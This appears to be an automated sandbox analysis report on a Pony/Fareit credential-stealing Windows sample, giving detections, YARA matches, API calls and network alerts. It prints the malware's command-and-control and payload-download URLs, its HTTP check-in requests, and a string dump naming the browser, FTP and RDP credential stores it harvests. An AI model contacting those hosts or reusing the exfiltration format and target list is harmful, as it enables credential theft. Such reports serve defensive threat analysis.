Edit tour

Windows Analysis Report
pbfe2Xcxue.exe

Overview

General Information

Sample name:	pbfe2Xcxue.exe renamed because original name is a hash value
Original sample name:	604b748dca0419d94b618beb4c5b4710.exe
Analysis ID:	1583552
MD5:	604b748dca0419d94b618beb4c5b4710
SHA1:	afec5dc4982d4ea85722448d2e8155274902c141
SHA256:	b613f1a4fe5e99b6c4d32e72bef59d1e270a337b5b5d4e775cfb58a18b38c66e
Tags:	exePonyuser-abuse_ch
Infos:

Detection

Pony

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Pony

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Detected potential crypto function

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

pbfe2Xcxue.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\pbfe2Xcxue.exe" MD5: 604B748DCA0419D94B618BEB4C5B4710)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
EvilPony, Ponyshe	Privately modded version of the Pony stealer.	No Attribution	https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/	https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony

Malware Configuration

Threatname: Pony

{"C2 list": ["http://67.158.38.155/jiKEb8.exe", "http://oliviagurun.com/forum/viewtopic.php", "http://aasthakitchen.com/vMTXwWg.exe", "http://onlyidea.com/forum/viewtopic.php", "http://ftp.pexgol.com/bm6dog.exe", "http://originalpizzaplus.ca/forum/viewtopic.php", "http://onecable.ca/forum/viewtopic.php", "http://www.ue-electronics.de/XjwiYdic.exe"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Pony	Yara detected Pony	Joe Security
00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x1fb1:$a1: \Global Downloader 0x173a:$a2: wiseftpsrvs.bin 0x1e11:$a3: SiteServer %d\SFTP 0x1e05:$a4: %s\Keychain 0x206f:$a5: Connections.txt 0x23b6:$a6: ftpshell.fsi 0x2b11:$a7: inetcomm server passwords
00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0x913:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x2b58:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x148:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x806:$s3: POST %s HTTP/1.0 0x82f:$s4: Accept-Encoding: identity, *;q=0
00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Pony	Yara detected Pony	Joe Security
00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x141b1:$a1: \Global Downloader 0x1393a:$a2: wiseftpsrvs.bin 0x14011:$a3: SiteServer %d\SFTP 0x14005:$a4: %s\Keychain 0x1426f:$a5: Connections.txt 0x145b6:$a6: ftpshell.fsi 0x14d11:$a7: inetcomm server passwords
00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12b13:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14d58:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x12348:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12a06:$s3: POST %s HTTP/1.0 0x2640:$s4: Accept-Encoding: identity, ;q=0 0x12a2f:$s4: Accept-Encoding: identity, ;q=0
00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp	Fareit	Fareit Payload	kevoreilly	0x156fd:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
Process Memory Space: pbfe2Xcxue.exe PID: 7428	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: pbfe2Xcxue.exe PID: 7428	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: pbfe2Xcxue.exe PID: 7428	JoeSecurity_Pony	Yara detected Pony	Joe Security
Process Memory Space: pbfe2Xcxue.exe PID: 7428	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x100f9:$a1: \Global Downloader 0x17635:$a1: \Global Downloader 0xf579:$a2: wiseftpsrvs.bin 0x16a5c:$a2: wiseftpsrvs.bin 0xffb4:$a3: SiteServer %d\SFTP 0x174f0:$a3: SiteServer %d\SFTP 0xffa8:$a4: %s\Keychain 0x174e4:$a4: %s\Keychain 0x101ad:$a5: Connections.txt 0x176e9:$a5: Connections.txt 0x1090c:$a6: ftpshell.fsi 0x17dcd:$a6: ftpshell.fsi 0x1101c:$a7: inetcomm server passwords 0x184dd:$a7: inetcomm server passwords
Process Memory Space: pbfe2Xcxue.exe PID: 7428	pony	Identify Pony	Brian Wallace @botnet_hunter	0xda42:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0xe834:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x11911:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14f25:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x15d17:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x18dd2:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0xcf57:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0xd0bc:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x143c8:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1452d:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0xd9ba:$s3: POST %s HTTP/1.0 0xe7f1:$s3: POST %s HTTP/1.0 0x14e2f:$s3: POST %s HTTP/1.0 0x15cd4:$s3: POST %s HTTP/1.0 0x40:$s4: Accept-Encoding: identity, ;q=0 0xb306:$s4: Accept-Encoding: identity, ;q=0 0xc6ee:$s4: Accept-Encoding: identity, ;q=0 0x14e58:$s4: Accept-Encoding: identity, ;q=0 0x20f15:$s4: Accept-Encoding: identity, ;q=0 0x219df:$s4: Accept-Encoding: identity, ;q=0
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.3.pbfe2Xcxue.exe.a70000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.3.pbfe2Xcxue.exe.a70000.0.unpack	JoeSecurity_Pony	Yara detected Pony	Joe Security
0.3.pbfe2Xcxue.exe.a70000.0.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x11d13:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x12f58:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x11548:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x11c06:$s3: POST %s HTTP/1.0 0x1840:$s4: Accept-Encoding: identity, ;q=0 0x11c2f:$s4: Accept-Encoding: identity, ;q=0
0.3.pbfe2Xcxue.exe.a70000.0.unpack	Fareit	Fareit Payload	kevoreilly	0x138fd:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack	JoeSecurity_Pony	Yara detected Pony	Joe Security
0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x141b1:$a1: \Global Downloader 0x1393a:$a2: wiseftpsrvs.bin 0x14011:$a3: SiteServer %d\SFTP 0x14005:$a4: %s\Keychain 0x1426f:$a5: Connections.txt 0x145b6:$a6: ftpshell.fsi 0x14d11:$a7: inetcomm server passwords
0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12b13:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14d58:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x12348:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12a06:$s3: POST %s HTTP/1.0 0x2640:$s4: Accept-Encoding: identity, ;q=0 0x12a2f:$s4: Accept-Encoding: identity, ;q=0
0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack	Fareit	Fareit Payload	kevoreilly	0x156fd:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
0.2.pbfe2Xcxue.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.pbfe2Xcxue.exe.400000.0.unpack	JoeSecurity_Pony	Yara detected Pony	Joe Security
0.2.pbfe2Xcxue.exe.400000.0.unpack	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x141b1:$a1: \Global Downloader 0x1393a:$a2: wiseftpsrvs.bin 0x14011:$a3: SiteServer %d\SFTP 0x14005:$a4: %s\Keychain 0x1426f:$a5: Connections.txt 0x145b6:$a6: ftpshell.fsi 0x14d11:$a7: inetcomm server passwords
0.2.pbfe2Xcxue.exe.400000.0.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12b13:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14d58:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x12348:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12a06:$s3: POST %s HTTP/1.0 0x2640:$s4: Accept-Encoding: identity, ;q=0 0x12a2f:$s4: Accept-Encoding: identity, ;q=0
0.2.pbfe2Xcxue.exe.400000.0.unpack	Fareit	Fareit Payload	kevoreilly	0x156fd:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
Click to see the 9 entries

Suricata Signatures

ET MALWARE Fareit/Pony Downloader Checkin 2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T03:12:50.647005+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49736	3.33.130.190	80	TCP
2025-01-03T03:12:56.151035+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49754	3.33.130.190	80	TCP
2025-01-03T03:13:01.668659+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49788	3.33.130.190	80	TCP
2025-01-03T03:13:10.087497+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49842	3.33.130.190	80	TCP
2025-01-03T03:13:16.509557+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49885	3.33.130.190	80	TCP
2025-01-03T03:13:22.010132+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49923	3.33.130.190	80	TCP
2025-01-03T03:13:30.447507+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49973	3.33.130.190	80	TCP
2025-01-03T03:13:35.917877+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	50009	3.33.130.190	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: pbfe2Xcxue.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://onlyidea.com/forum/viewtopic.php	Avira URL Cloud: Label: phishing
Source: https://login.live.co	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.pbfe2Xcxue.exe.400000.0.unpack

Malware Configuration Extractor: Pony {"C2 list": ["http://67.158.38.155/jiKEb8.exe", "http://oliviagurun.com/forum/viewtopic.php", "http://aasthakitchen.com/vMTXwWg.exe", "http://onlyidea.com/forum/viewtopic.php", "http://ftp.pexgol.com/bm6dog.exe", "http://originalpizzaplus.ca/forum/viewtopic.php", "http://onecable.ca/forum/viewtopic.php", "http://www.ue-electronics.de/XjwiYdic.exe"]}

Multi AV Scanner detection for submitted file

Source: pbfe2Xcxue.exe	ReversingLabs: Detection: 95%
Source: pbfe2Xcxue.exe	Virustotal: Detection: 75%			Perma Link

Yara detected Pony

Source: Yara match	File source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: pbfe2Xcxue.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_0040A9D6 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,	0_2_0040A9D6
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_0040D67C CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,	0_2_0040D67C
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_0040A81B WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,	0_2_0040A81B
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_0040AC2F CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,	0_2_0040AC2F
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_0040D0FB lstrlenA,CryptUnprotectData,LocalFree,	0_2_0040D0FB
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_0040ADE6 lstrlenA,CryptUnprotectData,LocalFree,	0_2_0040ADE6
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_0040465C CryptUnprotectData,LocalFree,	0_2_0040465C
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_0040BEF4 CryptUnprotectData,LocalFree,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,	0_2_0040BEF4

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Unpacked PE file: 0.2.pbfe2Xcxue.exe.400000.0.unpack

Source: pbfe2Xcxue.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: pbfe2Xcxue.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_00405478 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	0_2_00405478
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_00404426 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_00404426
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_00405108 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_00405108
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_00408DAD FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_00408DAD
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_00408C29 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_00408C29
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_00409AF6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_00409AF6

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49754 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49842 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49736 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49788 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49885 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49973 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49923 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:50009 -> 3.33.130.190:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://67.158.38.155/jiKEb8.exe
Source: Malware configuration extractor	URLs: http://oliviagurun.com/forum/viewtopic.php
Source: Malware configuration extractor	URLs: http://aasthakitchen.com/vMTXwWg.exe
Source: Malware configuration extractor	URLs: http://onlyidea.com/forum/viewtopic.php
Source: Malware configuration extractor	URLs: http://ftp.pexgol.com/bm6dog.exe
Source: Malware configuration extractor	URLs: http://originalpizzaplus.ca/forum/viewtopic.php
Source: Malware configuration extractor	URLs: http://onecable.ca/forum/viewtopic.php
Source: Malware configuration extractor	URLs: http://www.ue-electronics.de/XjwiYdic.exe

Source: Joe Sandbox View

IP Address: 3.33.130.190 3.33.130.190

Source: Joe Sandbox View

ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB

Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: /Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: /Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: /Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: /Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: /Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: /Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: /Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: /Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: 0_2_00403133 recv,

0_2_00403133

Source: pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_ftp://Software\Adobe\CommonSiteServersSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlWeb DataLogin DataSQLite format 3table() CONSTRAINTPRIMARYUNIQUECHECKFOREIGNloginsorigin_urlpassword_valueusername_valueftp://http://https://\Google\Chrome\Chromium\ChromePlusSoftware\ChromePlusInstall_Dir\Bromium\Nichrome\Comodo\RockMeltK-Meleon\K-Meleon\ProfilesEpic\Epic\EpicStaff-FTPsites.ini\Sites\Visicom Media.ftpSettings\Global DownloaderSM.archFreshFTP.SMFBlazeFtpsite.datLastPasswordLastAddressLastUserLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtp.fplFTP++.Link\shell\open\commandGoFTPConnections.txt3D-FTPsites.ini\3D-FTP\SiteDesignerSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTP\NetSarang.xfp.rdpTERMSRV/password 51:b:username:s:full address:s:.TERMSRV/FTP NowFTPNowsites.xmlSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%dPasswordServerNameUserIDInitialDirectoryPortNumberServerType equals www.facebook.com (Facebook)
Source: pbfe2Xcxue.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: oliviagurun.com
Source: global traffic	DNS traffic detected: DNS query: onecable.ca

Source: unknown

